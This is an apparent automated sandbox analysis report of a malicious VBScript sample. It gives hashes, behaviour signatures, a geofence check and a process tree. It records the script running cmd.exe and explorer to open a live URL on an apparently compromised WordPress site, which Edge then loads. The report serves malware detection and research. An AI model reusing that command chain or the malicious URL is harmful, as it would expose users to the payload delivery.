Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
21-04-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Resource
win10v2004-20240412-en
General
-
Target
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
-
Size
27KB
-
MD5
75ec9f68a5b62705c115db5119a78134
-
SHA1
6209f948992fd18d4fc6fc6f89d9815369ac8931
-
SHA256
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
-
SHA512
82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
-
SSDEEP
384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exeflow pid process 28 4528 WScript.exe 29 4528 WScript.exe 31 4528 WScript.exe 35 4528 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepid process 2616 msedge.exe 2616 msedge.exe 2972 msedge.exe 2972 msedge.exe 4120 identity_helper.exe 4120 identity_helper.exe 5164 msedge.exe 5164 msedge.exe 5164 msedge.exe 5164 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe 2972 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.execmd.exeexplorer.exemsedge.exedescription pid process target process PID 4528 wrote to memory of 3660 4528 WScript.exe cmd.exe PID 4528 wrote to memory of 3660 4528 WScript.exe cmd.exe PID 3660 wrote to memory of 4224 3660 cmd.exe explorer.exe PID 3660 wrote to memory of 4224 3660 cmd.exe explorer.exe PID 1040 wrote to memory of 2972 1040 explorer.exe msedge.exe PID 1040 wrote to memory of 2972 1040 explorer.exe msedge.exe PID 2972 wrote to memory of 5036 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 5036 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 4676 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2616 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2616 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe PID 2972 wrote to memory of 2160 2972 msedge.exe msedge.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1e3f46f8,0x7ffa1e3f4708,0x7ffa1e3f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,764220793407269482,1021042501731092860,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD55e2f0fe48e7ee1aad1c24db5c01c354a
SHA15bfeb862e107dd290d87385dc9369bd7a1006b36
SHA256f13b3ebe8d71bd0086d5bb82364c35f59a95d32b39753af251e8639360e291a9
SHA512140d026437fd5e8a874cd00b03950c8f010e1a0732a0a1cc5bdde477e7f8315ccb95790bb4c15b8dbaab9468ad532eb885b6c429300a64e39412d976d079324e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD57e0880992c640aca08737893588a0010
SHA16ceec5cb125a52751de8aeda4bab7112f68ae0fe
SHA2568649a39877c190ec740a5422284ec5f9ff509b30b2d7896635476873dd8824e2
SHA51252bd0a38ca7f43b26731966035045b1cbd8b60b2d81bdf9aad791cf444da8af8b722ebf3cb364a6e660bebdf23084eb0e30bc23562575b704801669817549f8a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
499B
MD501f5bd7cd51a37e8e853ead645efcdb2
SHA10fae5557c7d6f755a4311d048edcbae74141816d
SHA256c3a6be909fde4a711ff526d93586bc4f1a3d3025058f20b456bf192bede217bf
SHA512a7e39a16b1c03ee4ce48007d8fac160df68b26662e21f7235420d42920713320547cf3a72f26d2b2f1edda3231c3e55f0ba11e08a98610332aef9415dfa8e821
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5b0b865a447c3bde8be029558ee422908
SHA1d864c6a87c7699ee5550a33915ce078122c44f5b
SHA25632035b47ab932337f37c648bbe64e9ddf42a18d2c9ea1c13d5dcacb385373708
SHA512d370c58c0c37148af9030f3e596eb0fdc61dbc285dc2be4763f9951027a3c33ad143020dbdc4d2ab7ac18a4cc154a0d92912fb13eef24cdf983ada9b0c866224
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57f8b30335e5a472b3cb98466b78949f7
SHA142bf1a7c139aeadb87a70c6664282ad04441c926
SHA25696e2029655429989129652160ef7166736babcbb00368123d6f1a65ee5a14d60
SHA512e3bb43a7808c62d52122c8f75c8898fc7e8dad4fc77a1a0b88014d0ff9a50e21131764d932a991e561a8d04905c7b18990c67901862ad8057bd850c1504d6587
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD526c41d4d865b13eab6f9d766c5954f28
SHA1fb27015dfc581c8411c8b543fa427d9ca429b60d
SHA25623343da58b1cbdb4da06ea839876c2a1a659dad547d7c32823b1ca0fca8516a4
SHA51257e2f76c01f30d399aaac2ac8a00cdce3ffdfe2dc010cf14d163fb9941c530744ee2251cdacf85ae9c0e2e9a94681bbaac1d875cc5d4b974d7903dd4105a9662
-
\??\pipe\LOCAL\crashpad_2972_AEDQVHPSLGTUGZGNMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e